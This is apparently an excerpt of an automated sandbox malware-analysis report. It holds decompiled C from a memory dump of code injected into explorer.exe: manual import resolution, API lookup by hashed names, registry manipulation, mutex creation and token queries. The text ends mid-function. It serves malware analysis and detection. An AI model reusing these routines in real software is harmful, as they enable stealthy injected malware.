                  • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                  • memset.MSVCRT ref: 0008CFE2
                  • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                  • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
                  • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
                  • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 50%
                  			E0009249B(signed int __eax, intOrPtr _a4) {
                  				intOrPtr* _v8;
                  				signed int* _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				struct HINSTANCE__* _v48;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				intOrPtr _v60;
                  				signed int _v64;
                  				signed int _t109;
                  				signed int _t112;
                  				signed int _t115;
                  				struct HINSTANCE__* _t121;
                  				void* _t163;
                  
                  				_v44 = _v44 & 0x00000000;
                  				if(_a4 != 0) {
                  					_v48 = GetModuleHandleA("kernel32.dll");
                  					_v40 = E0008E099(_v48, "GetProcAddress");
                  					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  					_v32 = _v52;
                  					_t109 = 8;
                  					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                  						L24:
                  						return 0;
                  					}
                  					_v56 = 0x80000000;
                  					_t112 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_v8 = _v8 + 0x14;
                  					}
                  					_t115 = 8;
                  					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                  						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                  						_v36 = _t121;
                  						if(_v36 != 0) {
                  							if( *_v8 == 0) {
                  								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                  							} else {
                  								_v12 =  *_v8 + _a4;
                  							}
                  							_v28 = _v28 & 0x00000000;
                  							while( *_v12 != 0) {
                  								_v24 = _v24 & 0x00000000;
                  								_v16 = _v16 & 0x00000000;
                  								_v64 = _v64 & 0x00000000;
                  								_v20 = _v20 & 0x00000000;
                  								if(( *_v12 & _v56) == 0) {
                  									_v60 =  *_v12 + _a4;
                  									_v20 = _v60 + 2;
                  									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                  									_v16 = _v40(_v36, _v20);
                  								} else {
                  									_v24 =  *_v12;
                  									_v20 = _v24 & 0x0000ffff;
                  									_v16 = _v40(_v36, _v20);
                  								}
                  								if(_v24 != _v16) {
                  									_v44 = _v44 + 1;
                  									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                  										 *_v12 = _v16;
                  									} else {
                  										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                  									}
                  								}
                  								_v12 =  &(_v12[1]);
                  								_v28 = _v28 + 4;
                  							}
                  							_v8 = _v8 + 0x14;
                  							continue;
                  						}
                  						_t163 = 0xfffffffd;
                  						return _t163;
                  					}
                  					goto L24;
                  				}
                  				return __eax | 0xffffffff;
                  			}
























                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 00092551
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                  • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                  • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 80%
                  			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				int _v20;
                  				char _v24;
                  				char _v28;
                  				void* _v32;
                  				void* _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v56;
                  				void _v576;
                  				intOrPtr _t63;
                  				intOrPtr _t72;
                  				intOrPtr _t80;
                  				intOrPtr _t81;
                  				intOrPtr _t82;
                  				signed int _t85;
                  				intOrPtr _t87;
                  				int _t89;
                  				intOrPtr _t90;
                  				intOrPtr _t92;
                  				void* _t96;
                  				void* _t97;
                  				void* _t98;
                  				void* _t99;
                  				void* _t100;
                  				void* _t108;
                  
                  				_t108 = __fp0;
                  				_t96 = __edx;
                  				_t89 = 0;
                  				_v8 = 0;
                  				memset( &_v576, 0, 0x208);
                  				_v28 = 0x104;
                  				_v20 = 0x3fff;
                  				_v16 = 0;
                  				_t98 = E00088604(0x3fff);
                  				_t100 = _t99 + 0x10;
                  				_v32 = _t98;
                  				if(_t98 == 0) {
                  					L18:
                  					return 0;
                  				}
                  				_t97 = E00088604(0x800);
                  				_v36 = _t97;
                  				if(_t97 == 0) {
                  					goto L18;
                  				}
                  				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                  					L15:
                  					if(_v8 != 0) {
                  						_t63 =  *0x9e68c; // 0x293fab8
                  						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                  					}
                  					E0008861A( &_v32, 0x3fff);
                  					E0008861A( &_v36, 0x800);
                  					goto L18;
                  				}
                  				_push( &_v56);
                  				_push( &_v40);
                  				_push( &_v44);
                  				_push( &_v48);
                  				_push( &_v24);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push( &_v28);
                  				_push( &_v576);
                  				_t72 =  *0x9e68c; // 0x293fab8
                  				_push(_v8);
                  				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                  					__eflags = _v24;
                  					if(_v24 == 0) {
                  						goto L15;
                  					}
                  					_v12 = 0;
                  					do {
                  						memset(_t97, 0, 0x800);
                  						memset(_t98, 0, 0x3fff);
                  						_t100 = _t100 + 0x18;
                  						_v20 = 0x3fff;
                  						_v16 = 0x800;
                  						 *_t98 = 0;
                  						_t80 =  *0x9e68c; // 0x293fab8
                  						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                  						__eflags = _t81;
                  						if(_t81 == 0) {
                  							_t82 =  *0x9e690; // 0x293fb90
                  							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                  							__eflags = _t90;
                  							if(_t90 != 0) {
                  								_t92 =  *0x9e68c; // 0x293fab8
                  								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                  								__eflags = _a16;
                  								if(_a16 != 0) {
                  									_t85 = E0008C392(_t90);
                  									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                  									if(__eflags == 0) {
                  										__eflags = 0;
                  										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                  									}
                  									E0008B1B1(_t90, _t96, __eflags, _t108);
                  								}
                  							}
                  							_t89 = _v12;
                  						}
                  						_t89 = _t89 + 1;
                  						_v12 = _t89;
                  						__eflags = _t89 - _v24;
                  					} while (_t89 < _v24);
                  					goto L15;
                  				}
                  				_t87 =  *0x9e68c; // 0x293fab8
                  				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                  				goto L15;
                  			}

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateHeapOpen
                  • String ID:
                  • API String ID: 2508404634-0
                  • Opcode ID: 2c10b8fd77ca7376de3cbe200ec582f4a2f8f81022b5455d208053da19f68b67
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: 2c10b8fd77ca7376de3cbe200ec582f4a2f8f81022b5455d208053da19f68b67
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v92;
                  				intOrPtr _t41;
                  				signed int _t47;
                  				signed int _t49;
                  				signed int _t51;
                  				void* _t56;
                  				struct HINSTANCE__* _t58;
                  				_Unknown_base(*)()* _t59;
                  				intOrPtr _t60;
                  				void* _t62;
                  				intOrPtr _t63;
                  				void* _t69;
                  				char _t70;
                  				void* _t75;
                  				CHAR* _t80;
                  				void* _t82;
                  
                  				_t75 = __ecx;
                  				_v12 = __edx;
                  				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                  				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                  				if(_t41 == 0) {
                  					L4:
                  					return 0;
                  				}
                  				_t62 = _t41 + __ecx;
                  				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                  				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                  				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                  				_t47 = 0;
                  				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_v8 = 0;
                  				_v16 = _t63;
                  				if(_t63 == 0) {
                  					goto L4;
                  				} else {
                  					goto L2;
                  				}
                  				while(1) {
                  					L2:
                  					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                  					_t51 = _v8;
                  					if((_t49 ^ 0x218fe95b) == _v12) {
                  						break;
                  					}
                  					_t73 = _v20;
                  					_t47 = _t51 + 1;
                  					_v8 = _t47;
                  					if(_t47 < _v16) {
                  						continue;
                  					}
                  					goto L4;
                  				}
                  				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                  				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                  				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                  					return _t80;
                  				} else {
                  					_t56 = 0;
                  					while(1) {
                  						_t70 = _t80[_t56];
                  						if(_t70 == 0x2e || _t70 == 0) {
                  							break;
                  						}
                  						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                  						_t56 = _t56 + 1;
                  						if(_t56 < 0x40) {
                  							continue;
                  						}
                  						break;
                  					}
                  					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                  					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                  					if( *((char*)(_t56 + _t80)) != 0) {
                  						_t80 =  &(( &(_t80[1]))[_t56]);
                  					}
                  					_t40 =  &_v92; // 0x6c6c642e
                  					_t58 = LoadLibraryA(_t40); // executed
                  					if(_t58 == 0) {
                  						goto L4;
                  					}
                  					_t59 = GetProcAddress(_t58, _t80);
                  					if(_t59 == 0) {
                  						goto L4;
                  					}
                  					return _t59;
                  				}
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t12;
                  				void* _t20;
                  				void* _t22;
                  				union _TOKEN_INFORMATION_CLASS _t28;
                  				void* _t31;
                  
                  				_push(_t22);
                  				_push(_t22);
                  				_t31 = 0;
                  				_t28 = __edx;
                  				_t20 = _t22;
                  				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                  					L6:
                  					_t12 = _t31;
                  				} else {
                  					_t31 = E00088604(_v8);
                  					_v12 = _t31;
                  					if(_t31 != 0) {
                  						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                  							goto L6;
                  						} else {
                  							E0008861A( &_v12, _t16);
                  							goto L3;
                  						}
                  					} else {
                  						L3:
                  						_t12 = 0;
                  					}
                  				}
                  				return _t12;
                  			}

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: e51f026ae96c3c8f60bad79ad9c5e503849fc6e82ed7bacb152c5b9dcafac048
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: e51f026ae96c3c8f60bad79ad9c5e503849fc6e82ed7bacb152c5b9dcafac048
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                  				intOrPtr _t10;
                  				void* _t13;
                  				void* _t19;
                  				signed int _t21;
                  				signed int _t22;
                  
                  				_t13 = __edx;
                  				if(__ecx != 0) {
                  					_t22 = 0;
                  					_t19 = CreateMutexA(0, 1, __ecx);
                  					if(_t19 != 0) {
                  						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                  							_t22 = 1;
                  							 *_a4 = _t19;
                  						} else {
                  							_t10 =  *0x9e684; // 0x293f8f0
                  							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                  						}
                  					} else {
                  						GetLastError();
                  						_t22 = 0xffffffff;
                  					}
                  				} else {
                  					_t22 = _t21 | 0xffffffff;
                  				}
                  				return _t22;
                  			}

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                  				void* _v8;
                  				int _v12;
                  				int _v16;
                  				void* _v20;
                  				int _v24;
                  				void* _v28;
                  				char _v32;
                  				char _v36;
                  				int* _v40;
                  				int** _v44;
                  				void _v108;
                  				int* _t90;
                  				int _t91;
                  				char* _t92;
                  				long _t96;
                  				int* _t97;
                  				intOrPtr _t98;
                  				int* _t101;
                  				intOrPtr _t110;
                  				int* _t111;
                  				int* _t112;
                  				intOrPtr _t122;
                  				char* _t125;
                  				intOrPtr _t126;
                  				intOrPtr _t128;
                  				int* _t129;
                  				intOrPtr _t131;
                  				int* _t133;
                  				intOrPtr _t134;
                  				int* _t135;
                  				intOrPtr _t136;
                  				char* _t139;
                  				int _t143;
                  				int _t147;
                  				intOrPtr _t148;
                  				int* _t149;
                  				int* _t154;
                  				int** _t155;
                  				int* _t161;
                  				int* _t163;
                  				intOrPtr _t164;
                  				intOrPtr _t171;
                  				int _t176;
                  				char* _t177;
                  				char* _t178;
                  				char _t179;
                  				void* _t180;
                  				void* _t181;
                  				void* _t183;
                  
                  				_t176 = 0;
                  				_v24 = __edx;
                  				_t177 = 0;
                  				_v32 = __ecx;
                  				_v28 = 0;
                  				_v8 = 0x80000001;
                  				_v20 = 0;
                  				_t155 = E00088604(0x110);
                  				_v44 = _t155;
                  				if(_t155 != 0) {
                  					_t158 = _a4;
                  					_t155[0x42] = _a4;
                  					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                  					_t161 = _v108;
                  					__eflags = _t161 - 0x61 - 0x19;
                  					_t90 = _t161;
                  					if(_t161 - 0x61 <= 0x19) {
                  						_t90 = _t90 - 0x20;
                  						__eflags = _t90;
                  					}
                  					_v108 = _t90;
                  					_t91 = E000895C7(0x4d2);
                  					_t163 = _v24;
                  					_v16 = _t91;
                  					__eflags = _t163;
                  					if(_t163 == 0) {
                  						L16:
                  						_t164 =  *0x9e688; // 0xb0000
                  						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                  						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                  							_push(_t176);
                  							_push( &_v108);
                  							_push("\\");
                  							_t92 = E00089292(_t91);
                  							_t181 = _t181 + 0x10;
                  							L20:
                  							_t177 = _t92;
                  							_v20 = _t177;
                  							goto L21;
                  						}
                  						_v24 = _t176;
                  						_v8 = 0x80000003;
                  						_t122 =  *0x9e68c; // 0x293fab8
                  						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                  						__eflags = _v24 - _t177;
                  						if(_v24 == _t177) {
                  							goto L21;
                  						}
                  						_push(_t176);
                  						_push( &_v108);
                  						_t125 = "\\";
                  						_push(_t125);
                  						_push(_v16);
                  						_push(_t125);
                  						_t92 = E00089292(_v24);
                  						_t181 = _t181 + 0x18;
                  						goto L20;
                  					} else {
                  						_t126 =  *0x9e688; // 0xb0000
                  						_t128 =  *0x9e68c; // 0x293fab8
                  						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                  						__eflags = _t129;
                  						if(_t129 != 0) {
                  							_t91 = _v16;
                  							goto L16;
                  						}
                  						_v12 = _t176;
                  						_t131 =  *0x9e68c; // 0x293fab8
                  						_v8 = 0x80000003;
                  						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                  						__eflags = _v12 - _t177;
                  						if(_v12 == _t177) {
                  							L21:
                  							E000885C2( &_v16);
                  							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                  							__eflags = _t96;
                  							if(_t96 == 0) {
                  								_t97 = _a8;
                  								__eflags = _t97;
                  								if(_t97 != 0) {
                  									 *_t97 = 1;
                  								}
                  								_push(_v28);
                  								L30:
                  								_t98 =  *0x9e68c; // 0x293fab8
                  								 *((intOrPtr*)(_t98 + 0x1c))();
                  								_t155[0x43] = _v8;
                  								_t101 = E0008C379(_t177);
                  								 *_t155 = _t101;
                  								__eflags = _t101;
                  								if(_t101 == 0) {
                  									L32:
                  									E0008861A( &_v20, 0xffffffff);
                  									return _t155;
                  								} else {
                  									goto L31;
                  								}
                  								do {
                  									L31:
                  									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                  									_t176 = _t176 + 1;
                  									__eflags = _t176 -  *_t155;
                  								} while (_t176 <  *_t155);
                  								goto L32;
                  							}
                  							_v16 = _t176;
                  							_t110 =  *0x9e68c; // 0x293fab8
                  							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
                  							__eflags = _t111;
                  							if(_t111 == 0) {
                  								_t112 = _a8;
                  								__eflags = _t112;
                  								if(_t112 != 0) {
                  									 *_t112 = _t176;
                  								}
                  								_push(_v16);
                  								goto L30;
                  							}
                  							L23:
                  							E0008861A( &_v44, 0x110);
                  							memset( &_v108, _t176, 0x40);
                  							E0008861A( &_v20, 0xffffffff);
                  							goto L1;
                  						}
                  						_push(_t176);
                  						_push(_v16);
                  						_t178 = "\\";
                  						_push(_t178);
                  						_t133 = E00089292(_v12);
                  						_t181 = _t181 + 0x10;
                  						_v40 = _t133;
                  						__eflags = _t133;
                  						if(_t133 == 0) {
                  							goto L23;
                  						}
                  						_t134 =  *0x9e68c; // 0x293fab8
                  						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                  						__eflags = _t135;
                  						if(_t135 == 0) {
                  							_t136 =  *0x9e68c; // 0x293fab8
                  							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                  						} else {
                  							_t143 = E000895E1( &_v36, 0x34);
                  							_v24 = _t143;
                  							_t179 = E000892E5(_v32);
                  							_v32 = _t179;
                  							E000885D5( &_v24);
                  							_t183 = _t181 + 0x18;
                  							_t147 = E00089256(_v12);
                  							_v24 = _t147;
                  							_t148 =  *0x9e68c; // 0x293fab8
                  							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                  							__eflags = _t149;
                  							if(_t149 == 0) {
                  								_t154 = _a12;
                  								__eflags = _t154;
                  								if(_t154 != 0) {
                  									 *_t154 = 1;
                  								}
                  							}
                  							E0008861A( &_v32, 0xfffffffe);
                  							E0008861A( &_v24, 0xfffffffe);
                  							_t181 = _t183 + 0x10;
                  							_t178 = "\\";
                  						}
                  						_t139 = E00089292(_v12);
                  						_t171 =  *0x9e684; // 0x293f8f0
                  						_t181 = _t181 + 0x18;
                  						_t177 = _t139;
                  						_v20 = _t177;
                  						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                  						E0008861A( &_v40, 0xffffffff);
                  						goto L21;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}





















































                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 204 8a6a9-8a6b9 205 8a6bb-8a6bd 204->205 206 8a6c2-8a6cd call 8a63b 204->206 207 8a75b-8a75d 205->207 210 8a6d3-8a6e5 206->210 211 8a757 206->211 214 8a73d-8a748 210->214 215 8a6e7-8a6f8 call 88604 210->215 212 8a759-8a75a 211->212 212->207 214->211 219 8a74a-8a756 call 8861a 214->219 215->214 220 8a6fa-8a709 215->220 219->211 222 8a72d-8a73b ReadFile 220->222 222->214 223 8a70b-8a70f 222->223 225 8a75e-8a761 223->225 226 8a711-8a72c 223->226 225->214 227 8a763-8a76c 225->227 226->222 228 8a76e 227->228 229 8a770-8a77b CloseHandle 227->229 228->229 229->212
                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  				intOrPtr _t29;
                  				intOrPtr _t34;
                  				intOrPtr* _t39;
                  				void* _t47;
                  				intOrPtr _t55;
                  				intOrPtr _t58;
                  				char _t60;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t60 = 0;
                  				_v12 = 0;
                  				if(_a4 != 0) {
                  					_t47 = E0008A63B(_t50);
                  					if(_t47 == 0) {
                  						L11:
                  						_t26 = 0;
                  						L12:
                  						L13:
                  						return _t26;
                  					}
                  					_t27 =  *0x9e684; // 0x293f8f0
                  					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                  					if(_t58 == 0) {
                  						L9:
                  						_t29 =  *0x9e684; // 0x293f8f0
                  						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                  						if(_t60 != 0) {
                  							E0008861A( &_v12, 0);
                  						}
                  						goto L11;
                  					}
                  					_t4 = _t58 + 1; // 0x1
                  					_t34 = E00088604(_t4); // executed
                  					_t60 = _t34;
                  					_v12 = _t60;
                  					if(_t60 == 0) {
                  						goto L9;
                  					}
                  					_a4 = _a4 & 0;
                  					_push(0);
                  					_v8 = 0;
                  					_push( &_a4);
                  					_push(_t58);
                  					_push(_t60);
                  					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                  						if(_a4 == 0) {
                  							if(_v8 != _t58) {
                  								goto L9;
                  							}
                  							_t39 = _a8;
                  							 *((char*)(_t58 + _t60)) = 0;
                  							if(_t39 != 0) {
                  								 *_t39 = _t58;
                  							}
                  							CloseHandle(_t47);
                  							_t26 = _t60;
                  							goto L12;
                  						}
                  						_t55 = _v8 + _a4;
                  						_a4 = _a4 & 0x00000000;
                  						_push(0);
                  						_push( &_a4);
                  						_v8 = _t55;
                  						_push(_t58 - _t55);
                  						_push(_t55 + _t60);
                  					}
                  					goto L9;
                  				}
                  				_t26 = 0;
                  				goto L13;
                  			}















                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                  • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,0293FD30,00000400), ref: 0008A776
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseFileHandleRead
                  • String ID:
                  • API String ID: 2331702139-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E00085CEC() {
                  				void _v44;
                  				signed int _t8;
                  				intOrPtr _t14;
                  				intOrPtr _t15;
